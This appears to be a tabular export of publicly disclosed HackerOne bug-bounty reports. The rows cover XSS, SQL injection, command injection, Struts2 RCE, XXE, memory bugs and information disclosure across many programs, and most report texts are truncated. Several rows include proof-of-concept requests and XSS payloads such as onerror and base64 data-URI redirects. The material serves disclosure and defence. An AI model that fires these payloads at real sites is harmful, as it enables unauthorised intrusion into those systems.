"small": "https://profile-photos.hackerone-user-content.com/variants/WVQ792pdimTiEpL8JcJVzyrn/d3dc6b2d7e2dc3657e8861b0d7e2dfca1a6d513dd784c613f4e56738907cea98"
},
"... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "h1-ctf",
"id": 46757,
"offers_bounties": false,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "Let's save the holidays together! #Togethe... | false | full | 2021-01-11T22:36:53.487Z | null | null | 2 | {
"asset_identifier": "*.hackyholidays.h1ctf.com",
"asset_type": "WILDCARD",
"databaseId": 59882,
"max_severity": "critical"
} |
296,622 | Blind XXE on pu.vk.com | 2017-12-10T01:18:27.212Z | resolved | {
"cleared": false,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "https://profile-photos.hackerone-user-content.com/variants/000/136/191/5e385ddcb9022257bb238b1bba3a1683a75e57e3_original.png/d3dc6b2d7e2dc3657e8861b0d7e2dfca... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "vkcom",
"id": 1254,
"offers_bounties": false,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "VKontakte is the largest European social net... | true | no-content | 2018-03-04T13:15:15.979Z | {
"id": 54,
"name": "XML External Entities (XXE)"
} | null | 16 | null | |
574,638 | Lack of proper paymentProfileUUID validation allows any number of free rides without any outstanding balance | 2019-05-08T23:55:03.051Z | resolved | {
"cleared": false,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "/assets/avatars/default-25f7248a18bdf9e2dc8310319b148d66cff430fa0fade6c5f25fee1b8d7f27ed.png"
},
"url": "/eequalsmc2",
"username": "eequalsmc2",
"ver... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "uber",
"id": 314,
"offers_bounties": true,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "",
"name": "Uber",
"twitter_handle": ""... | true | no-content | 2019-07-18T01:44:08.187Z | {
"id": 65,
"name": "Business Logic Errors"
} | null | 75 | null | |
181,803 | SQL Injection /webApp/oma_conf ctx parameter (viestinta.lahitapiola.fi) | 2016-11-12T17:58:34.924Z | resolved | **Vulnerable script**: /webApp/oma_conf
**Vulnerable parameter**: ctx[vars][email]
**Database**: PostgreSQL
**PoC**
```http
POST /webApp/oma_conf HTTP/1.1
Host: viestinta.lahitapiola.fi
Content-Type: application/x-www-form-urlencoded
Content-Length: 1131
ctx=%3Cctx+lang%3D%22en%22+date%3D%222016-11-12T17%3A33%3A06Z%2... | {
"cleared": false,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "https://profile-photos.hackerone-user-content.com/variants/000/002/205/e865d3ffcef54eba49cba80bd59502a347519715_original.jpeg/ede8cd84a64d5392a2bb88ecb598721... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "localtapiola",
"id": 8416,
"offers_bounties": true,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "LocalTapiola’s products and services c... | true | full | 2016-12-08T13:19:18.694Z | {
"id": 67,
"name": "SQL Injection"
} | null | 50 | null |
470,398 | Local privilege escalation bug using Keybase redirector on macOS | 2018-12-20T21:33:40.369Z | resolved | There's a local privilege escalation bug in the latest version of Keybase for
macOS.
The issue is in the process of launching `keybase-redirector`. The process works as follows:
1. Copy `keybase-redirector` binary to a root-only location
2. Check its signature
3. Launch the binary
[Code ref](https://github.com/keyba... | {
"cleared": false,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "/assets/avatars/default-25f7248a18bdf9e2dc8310319b148d66cff430fa0fade6c5f25fee1b8d7f27ed.png"
},
"url": "/votava",
"username": "votava",
"verified": ... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "keybase",
"id": 2809,
"offers_bounties": true,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "",
"name": "Keybase",
"twitter_hand... | true | full | 2019-01-30T18:15:40.373Z | {
"id": 75,
"name": "Privilege Escalation"
} | null | 23 | null |
245,296 | Persistent XSS on keybase.io via "payload" field in `/user/sigchain_signature.toffee` template | 2017-07-02T09:42:52.752Z | resolved | ## Issue
Keybase allows you to see other users' sigchains by navigating to <https://keybase.io/<username\>/sigchain>. The "Payload" field containing JSON related to the chainlink on the right side of the page is not correctly escaped during templating, leading to a persistent XSS as users have a high degree of control... | {
"cleared": false,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "https://profile-photos.hackerone-user-content.com/variants/000/002/447/d7846c3a70ff69fbfa83f43531b3ca68c55545df_original.JPG/cccd3716a6d2e06174d2a41492445cb1... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "keybase",
"id": 2809,
"offers_bounties": true,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "",
"name": "Keybase",
"twitter_hand... | true | full | 2019-03-14T15:15:33.139Z | {
"id": 62,
"name": "Cross-site Scripting (XSS) - Stored"
} | null | 265 | null |
418,145 | No rate limiting in changing room subject. | 2018-10-03T12:23:54.508Z | resolved | Before i shed more light on this: I noticed i can create over 200 apps but i don't really know how valid that was.
I want to report that there is no rate limiting in changing room subject.
Attacker scenrio:
1. Navigate to https://chaturbate.com/b/your username
2. Try to create a room subject and capture the request.
3... | {
"cleared": false,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "/assets/avatars/default-25f7248a18bdf9e2dc8310319b148d66cff430fa0fade6c5f25fee1b8d7f27ed.png"
},
"url": "/cunn",
"username": "cunn",
"verified": fals... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "chaturbate",
"id": 30475,
"offers_bounties": true,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "The largest online adult cam site",
... | true | full | 2018-10-09T03:59:44.566Z | null | null | 18 | {
"asset_identifier": "chaturbate.com",
"asset_type": "URL",
"databaseId": 11722,
"max_severity": "critical"
} |
238,915 | Text injection on status.algolia.com | 2017-06-11T06:55:15.028Z | resolved | Hi Algolia team!
I just found a text injection vulnerabilty in [status.algolia.com/clusters](https://status.algolia.com/clusters/) . Please follow the steps below.
**Vulnerable URL**
[status.algolia.com](https://status.algolia.com/clusters/)
Steps to reproduce:
* Go to [Vulnerable URL](https://status.algolia.com/c... | {
"cleared": false,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "https://profile-photos.hackerone-user-content.com/variants/000/111/452/3910a59fc37678124c0b2592126ea98758c2eb43_original.jpg/3c7b305354c9073c106ae3d1701798de... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "algolia",
"id": 443,
"offers_bounties": true,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "Hosted search API that delivers instant and ... | false | full | 2017-08-25T10:17:57.962Z | {
"id": 57,
"name": "Violation of Secure Design Principles"
} | null | 3 | null |
7,898 | Persistent Cross-site scripting vulnerability settings. | 2014-04-17T19:29:03.968Z | resolved | Hello,
I created an account with as group name `"><img src=x onerror=alert(4)>`, after that I went to settings and found a Cross-site scripting vulnerability located at that page.
The url for me : https://app.respond.ly/6sjp/settings/account
I have a proof of concept in the attachment.
best regards
Olivi... | {
"cleared": true,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "https://profile-photos.hackerone-user-content.com/variants/000/000/045/1828acf6bd0443abccd1796fb54be386d874708c_original.png/d3dc6b2d7e2dc3657e8861b0d7e2dfca1... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "respondly",
"id": 128,
"offers_bounties": false,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "Team Inbox for Email & Twitter",
"nam... | false | full | 2014-04-21T16:31:16.010Z | {
"id": 60,
"name": "Cross-site Scripting (XSS) - Generic"
} | null | 1 | null |
1,106,009 | critical information disclosure | 2021-02-17T22:01:23.421Z | resolved | ##Description:
hey all ,
I have found critical information through this endpoint /██████;
this endpoint contains all env vars used in a www.██████ such as server credentials, db ,mail , twitter client_id and client_secret , facebook client_id and client_secret, etc...
## Impact
full access control on every servi... | {
"cleared": false,
"disabled": true,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "/assets/avatars/default-25f7248a18bdf9e2dc8310319b148d66cff430fa0fade6c5f25fee1b8d7f27ed.png"
},
"url": "/ba56adcb299ff13a87475bf",
"username": "ba56adc... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "deptofdefense",
"id": 16064,
"offers_bounties": false,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "",
"name": "U.S. Dept Of Defens... | false | full | 2021-03-11T21:27:08.208Z | {
"id": 18,
"name": "Information Disclosure"
} | null | 19 | null |
157,813 | XSS on Meta Tag at https://m.olx.ph | 2016-08-09T10:04:09.787Z | resolved | Hi,
There is improper validation at q parameter on https://m.olx.ph/ where it can be manipulated by an attacker to include his/her XSS payload to execute javascript code.
As example:
``https://m.olx.ph/all-results?q=0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg" HTTP-EQUIV="refresh" a="a``
... | {
"cleared": false,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "https://profile-photos.hackerone-user-content.com/variants/000/002/150/f3874ccfe5a432c25e4443e62e72beed49ca425e_original.jpeg/ede8cd84a64d5392a2bb88ecb598721... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "olx",
"id": 8146,
"offers_bounties": false,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "OLX is an online classifieds platform that ena... | false | full | 2017-01-20T09:25:27.796Z | {
"id": 60,
"name": "Cross-site Scripting (XSS) - Generic"
} | null | 7 | null |
165,309 | Subdomain Takeover in http://genghis-cdn.shopify.io/ pointing to Fastly | 2016-09-02T15:25:15.655Z | resolved | Hi,
I've found a Shopifu cdn domain here which had an instance of fastly setup but did not remove the dns record when the service was cancelled. a subdomain takeover similar to that of https://hackerone.com/reports/32825 could be possible.
Vulnerable URL: http://genghis-cdn.shopify.io
Page Response:
```
Fastly erro... | {
"cleared": false,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "https://profile-photos.hackerone-user-content.com/variants/000/017/146/bc97fcb48703e602e82e5ab47ccf42d1e3f0480a_original.jpg/3c7b305354c9073c106ae3d1701798de... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "shopify",
"id": 1382,
"offers_bounties": true,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "Shopify is a multi-channel commerce platfor... | false | full | 2016-09-06T15:46:49.314Z | null | null | 22 | null |
204,568 | stack trace exposed on https://receipts.uber.com/ | 2017-02-08T12:39:39.710Z | informative | {
"cleared": false,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "/assets/avatars/default-25f7248a18bdf9e2dc8310319b148d66cff430fa0fade6c5f25fee1b8d7f27ed.png"
},
"url": "/mariogomez1",
"username": "mariogomez1",
"v... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "uber",
"id": 314,
"offers_bounties": true,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "",
"name": "Uber",
"twitter_handle": ""... | false | no-content | 2021-02-25T22:33:22.941Z | {
"id": 18,
"name": "Information Disclosure"
} | null | 7 | null | |
319,476 | `whereis` concatenates unsanitized input into exec() command | 2018-02-25T06:53:14.046Z | resolved | I would like to report command injection in `whereis`
It allows to inject arbitrary shell commands by trying to locate crafted filenames.
# Module
**module name:** whereis
**version:** 0.4.0
**npm page:** `https://www.npmjs.com/package/whereis`
## Module Description
> Simply get the first path to a bin on any syste... | {
"cleared": false,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "https://profile-photos.hackerone-user-content.com/variants/000/068/907/abd483931dad2c93e376707dd59719cc277309cd_original.png/d3dc6b2d7e2dc3657e8861b0d7e2dfca... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "nodejs-ecosystem",
"id": 23949,
"offers_bounties": true,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "This program was used to handle v... | false | full | 2018-03-28T06:17:58.607Z | {
"id": 58,
"name": "Command Injection - Generic"
} | null | 9 | {
"asset_identifier": "whereis",
"asset_type": "SOURCE_CODE",
"databaseId": 7254,
"max_severity": "critical"
} |
145,495 | nextcloud.com: Directory listening for 'wp-includes' forders | 2016-06-17T18:02:13.368Z | resolved | Hello guys,
**_Details:_**
The web server is configured to display the list of files contained in this directory. As a result of a misconfiguration - end user / attacker able to see content of the folders with systemically important files
**_Vulnerable place:_**
/wp-includes directory
when I tried to navigate to thi... | {
"cleared": false,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "https://profile-photos.hackerone-user-content.com/variants/003co5s7ttfbvqi1zah9g22ny3wm/d3dc6b2d7e2dc3657e8861b0d7e2dfca1a6d513dd784c613f4e56738907cea98"
}... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "nextcloud",
"id": 13291,
"offers_bounties": true,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "Access, share and protect your files, ca... | false | full | 2016-06-17T18:10:38.465Z | {
"id": 18,
"name": "Information Disclosure"
} | null | 4 | null |
1,070,532 | RCE Apache Struts2 remote command execution (S2-045) on [wifi-partner.mtn.com.gh] | 2021-01-03T11:18:36.101Z | resolved | ## Summary:
A Remote Code Execution vulnerability exists in Apache Struts2 when performing file upload based on Jakarta Multipart parser. It is possible to perform a RCE attack with a malicious Content-Type value. If the Content-Type value isn't valid an exception is thrown which is then used to display an error messag... | {
"cleared": false,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "https://profile-photos.hackerone-user-content.com/variants/gce5nrtrsgkov7le19btk4ra2mhq/d3dc6b2d7e2dc3657e8861b0d7e2dfca1a6d513dd784c613f4e56738907cea98"
}... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "mtn_group",
"id": 41919,
"offers_bounties": false,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "",
"name": "MTN Group",
"twitte... | false | full | 2021-09-09T11:34:14.647Z | {
"id": 70,
"name": "Code Injection"
} | null | 26 | {
"asset_identifier": "mtn.com.gh",
"asset_type": "URL",
"databaseId": 34315,
"max_severity": "critical"
} |
1,631,228 | [demo.stripo.email] HTTP request Smuggling | 2022-07-08T10:38:10.702Z | resolved | {
"cleared": false,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "https://profile-photos.hackerone-user-content.com/variants/rshtzgfzd3aqze11wxoban88t79d/3c7b305354c9073c106ae3d1701798defaaf5be844fb8fdfa49ca62f991a2c2c"
}... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "stripo",
"id": 42368,
"offers_bounties": false,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "Stripo is a lightweight and intuitive emai... | false | no-content | 2024-02-15T10:43:59.487Z | {
"id": 86,
"name": "HTTP Request Smuggling"
} | null | 13 | {
"asset_identifier": "stripo.email",
"asset_type": "URL",
"databaseId": 38701,
"max_severity": "medium"
} | |
221,264 | stack overflow #3 in libsass | 2017-04-15T18:47:12.337Z | resolved | `./sassc test387 /dev/null` triggers this stack overflow.
```
==9081==ERROR: AddressSanitizer: stack-overflow on address 0x7fffb48eadc0 (pc 0x00000087a07b bp 0x7fffb48eba30 sp 0x7fffb48ead60 T0)
#0 0x87a07a in Sass::Parser::parse_factor() /home/geeknik/libsass/src/parser.cpp:1379
#1 0x878304 in Sass::Parser::p... | {
"cleared": false,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "https://profile-photos.hackerone-user-content.com/variants/7xfGZCKCxUuGLYGfuUZM3XyY/d3dc6b2d7e2dc3657e8861b0d7e2dfca1a6d513dd784c613f4e56738907cea98"
},
... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "libsass",
"id": 2250,
"offers_bounties": false,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "LibSass is a C/C++ port of the Sass engine... | false | full | 2017-10-20T17:29:03.940Z | {
"id": 48,
"name": "Uncontrolled Resource Consumption"
} | null | 3 | null |
1,551,591 | CVE-2022-27776: Auth/cookie leak on redirect | 2022-04-27T07:10:47.625Z | resolved | ## Summary:
curl/libcurl can be coaxed to leak Authorization / Cookie headers by redirecting request to http:// URL on the same host. Successful exploitation requires that the attacker can either Man-in-the-Middle the connection or can access the traffic at the recipient side (for example by redirecting to a non-privil... | {
"cleared": false,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "/assets/avatars/default-25f7248a18bdf9e2dc8310319b148d66cff430fa0fade6c5f25fee1b8d7f27ed.png"
},
"url": "/nyymi",
"username": "nyymi",
"verified": fa... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "ibb",
"id": 54349,
"offers_bounties": true,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "The Internet Bug Bounty rewards security resea... | true | full | 2022-04-29T06:32:42.601Z | {
"id": 87,
"name": "Insufficiently Protected Credentials"
} | null | 22 | {
"asset_identifier": "https://github.com/curl/curl",
"asset_type": "SOURCE_CODE",
"databaseId": 80985,
"max_severity": "critical"
} |
46,818 | Twitter Card - Parent Window Redirection | 2015-02-05T22:56:25.001Z | resolved | Hi,
I was trying to find XSS on another website and I finally did.
After that I tried share this url on Twitter to show website owner, and noticed that I can run javascript on that iframe.
Javascript that I used on Twitter Card :
<script>top.window.location.href="https://google.com.tr"</script>
You ca... | {
"cleared": false,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "https://profile-photos.hackerone-user-content.com/variants/000/013/030/9cd92c00a321c851be6949d9b7c7c031c13fef64_original.png/d3dc6b2d7e2dc3657e8861b0d7e2dfca... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "x",
"id": 61,
"offers_bounties": true,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "X helps you create and share ideas and information ... | true | full | 2015-05-04T22:54:25.679Z | {
"id": 60,
"name": "Cross-site Scripting (XSS) - Generic"
} | null | 3 | null |
130,521 | Unsubscribe any user from receiving email | 2016-04-14T05:14:40.068Z | informative | hi,
At url `https://www.uber.com/unsubscribe` you can unsubscribe any email of any user, which is bit of concern for the people who wants to receive emails from uber.
only people who gets email from uber should be allowed to unsubscribe themselves from uber emails rather than anybody unsubscribing anyone
Regards
Ash... | {
"cleared": true,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "https://profile-photos.hackerone-user-content.com/variants/8yjzpineb8mc4wgnp84n16vuc9si/d3dc6b2d7e2dc3657e8861b0d7e2dfca1a6d513dd784c613f4e56738907cea98"
},... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "uber",
"id": 314,
"offers_bounties": true,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "",
"name": "Uber",
"twitter_handle": ""... | false | full | 2016-06-13T23:01:27.510Z | {
"id": 57,
"name": "Violation of Secure Design Principles"
} | null | 3 | null |
813,300 | Changes to data in a CVE request after draft via GraphQL query | 2020-03-08T20:42:00.136Z | resolved | ## Summary:
Our team has conducted a number of studies (tests) in the field of CVE Request. We found several statuses of such requests
`Awaiting Publication`, `Pending HackerOne approval`, `Cancelled` .
At the time of creating the request , we can change the data. However, we noticed that we can 't change them in othe... | {
"cleared": false,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "https://profile-photos.hackerone-user-content.com/variants/000/049/175/8449afdd3403f4de00b34719ee09823bad1c0a06_original.jpg/3c7b305354c9073c106ae3d1701798de... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "security",
"id": 13,
"offers_bounties": true,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "Vulnerability disclosure should be safe, tra... | false | full | 2020-05-15T17:23:49.575Z | {
"id": 106,
"name": "Modification of Assumed-Immutable Data (MAID)"
} | null | 14 | {
"asset_identifier": "hackerone.com",
"asset_type": "URL",
"databaseId": 3,
"max_severity": "critical"
} |
2,190,117 | File listing through scripts folder | 2023-10-02T18:52:44.480Z | resolved | ## Summary:
It's possible to list all hidden files that are located within the TVAVirtual.com Sharepoint folder structure.
## Steps To Reproduce:
1. Navigate to TvaVirtual.com
2. Open the pages source code and notice that its build using sharepoint pages.
3. Confirm that you see a listing for /SiteAssets/Scripts/js.c... | {
"cleared": false,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "/assets/avatars/default-25f7248a18bdf9e2dc8310319b148d66cff430fa0fade6c5f25fee1b8d7f27ed.png"
},
"url": "/itssixtynein",
"username": "itssixtynein",
... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "tennessee-valley-authority",
"id": 50979,
"offers_bounties": false,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "",
"name": "Tennes... | false | full | 2024-02-09T12:12:41.419Z | {
"id": 126,
"name": "File and Directory Information Exposure"
} | null | 40 | {
"asset_identifier": "http://tvavirtual.com",
"asset_type": "URL",
"databaseId": 517799,
"max_severity": "critical"
} |
1,586,524 | installed.json sensitive file was publicly accessible on your web application which discloses information about authors and admins | 2022-05-30T16:12:35.514Z | informative | ##kindly if you don't accept this issue please close it as informative , thanks in advance
##Description:
The installed.json file is a sensitive file and it was publicly accessible on your webserver , which discloses some information about your web site and users such as authors like admin as shown below:
`"authors":... | {
"cleared": false,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "https://hackerone-us-west-2-production-attachments.s3.us-west-2.amazonaws.com/variants/59qiti9oazy5hpff7s5iro3eg899/bbbf913458c48565d99f975f7ab9fc18ad1e989aa... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "yelp",
"id": 545,
"offers_bounties": true,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "Connecting people to great local businesses in ... | false | full | 2022-10-22T18:39:33.897Z | {
"id": 18,
"name": "Information Disclosure"
} | null | 4 | {
"asset_identifier": "blog.yelp.com",
"asset_type": "URL",
"databaseId": 43921,
"max_severity": "none"
} |
152,232 | NULL Pointer Dereference in exif_process_user_comment | 2016-07-19T07:55:52.244Z | resolved | There is a bug occur in exif_process_user_comment when trying to encode JIS string.
```
else if (!memcmp(szValuePtr, "JIS\0\0\0\0\0", 8)) {
/* JIS should be tanslated to MB or we leave it to the user - leave it to the user */
*pszEncoding = estrdup((const char*)szValuePtr);
szValuePtr = szValuePtr+8;
ByteCo... | {
"cleared": false,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "https://profile-photos.hackerone-user-content.com/variants/000/074/688/42c5ca5265ff965283d70fc52df2681dfd648d44_original.png/d3dc6b2d7e2dc3657e8861b0d7e2dfca... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "ibb",
"id": 54349,
"offers_bounties": true,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "The Internet Bug Bounty rewards security resea... | true | full | 2016-08-30T18:58:10.546Z | {
"id": 2,
"name": "Memory Corruption - Generic"
} | null | 2 | {
"asset_identifier": "PHP",
"asset_type": "OTHER",
"databaseId": 84120,
"max_severity": "none"
} |
1,072,078 | [Java] CWE-555: Query to detect password in Java EE configuration files | 2021-01-05T17:35:47.002Z | resolved | This bug was reported directly to GitHub Security Lab. | {
"cleared": true,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "/assets/avatars/default-25f7248a18bdf9e2dc8310319b148d66cff430fa0fade6c5f25fee1b8d7f27ed.png"
},
"url": "/luchua",
"username": "luchua",
"verified": t... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "github-security-lab",
"id": 45140,
"offers_bounties": true,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "",
"name": "GitHub Securit... | true | full | 2021-01-05T17:37:43.287Z | null | null | 38 | null |
480,778 | Heap-buffer-overflow in Perl__byte_dump_string (utf8.c) could lead to memory leak | 2019-01-16T08:31:57.672Z | resolved | With crafted regex match, I have found a heap-over-flow in function Perl__byte_dump_string, which would lead to memory leak.
* Reported to the [Perl security mailing list](https://rt.perl.org/Public/Bug/Display.html?id=132063) on 11 Sep 2017.
* Confirmed as a security flaw by TonyC on 24 Feb 2018
* CVE-2018-6797 assign... | {
"cleared": false,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "https://profile-photos.hackerone-user-content.com/variants/Md3sdzB9WvuY9YS5U39V4rEz/3c7b305354c9073c106ae3d1701798defaaf5be844fb8fdfa49ca62f991a2c2c"
},
... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "ibb",
"id": 54349,
"offers_bounties": true,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "The Internet Bug Bounty rewards security resea... | true | full | 2019-10-24T20:57:47.575Z | {
"id": 9,
"name": "Buffer Over-read"
} | null | 4 | {
"asset_identifier": "Perl (Legacy)",
"asset_type": "OTHER",
"databaseId": 84128,
"max_severity": "none"
} |
362,702 | XSS in express-useragent through HTTP User-Agent | 2018-06-06T11:28:49.469Z | informative | Hello,
I would like to report an XSS in express-useragent module due a lack of validating User-Agent header. Please note I already created an [Github issue](https://github.com/biggora/express-useragent/issues/98) and asked for CVE ( [CVE-2018-9863](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9863)). I ... | {
"cleared": false,
"disabled": true,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "/assets/avatars/default-25f7248a18bdf9e2dc8310319b148d66cff430fa0fade6c5f25fee1b8d7f27ed.png"
},
"url": "/b9b86c2fc8409c628fb3de6",
"username": "b9b86c2... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "nodejs-ecosystem",
"id": 23949,
"offers_bounties": true,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "This program was used to handle v... | false | full | 2018-07-06T13:34:36.850Z | {
"id": 60,
"name": "Cross-site Scripting (XSS) - Generic"
} | null | 3 | {
"asset_identifier": "express-useragent",
"asset_type": "SOURCE_CODE",
"databaseId": 11571,
"max_severity": "critical"
} |
226,211 | SQL Injection vulnerability in a DoD website | 2017-05-04T22:22:41.141Z | resolved | {
"cleared": true,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "https://profile-photos.hackerone-user-content.com/variants/UzZ51ihxTiTDZzkEovExwXJn/3c7b305354c9073c106ae3d1701798defaaf5be844fb8fdfa49ca62f991a2c2c"
},
"... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "deptofdefense",
"id": 16064,
"offers_bounties": false,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "",
"name": "U.S. Dept Of Defens... | false | no-content | 2017-08-15T16:04:37.221Z | {
"id": 67,
"name": "SQL Injection"
} | null | 2 | null | |
887,818 | [H1-2006 2020] I successfully solved it! | 2020-05-31T08:44:50.216Z | resolved | Hello,
I'll get post there the write-up soon. Here is flag: `^FLAG^736c635d8842751b8aafa556154eb9f3$FLAG$`
Sincerely,
@zeroxyele
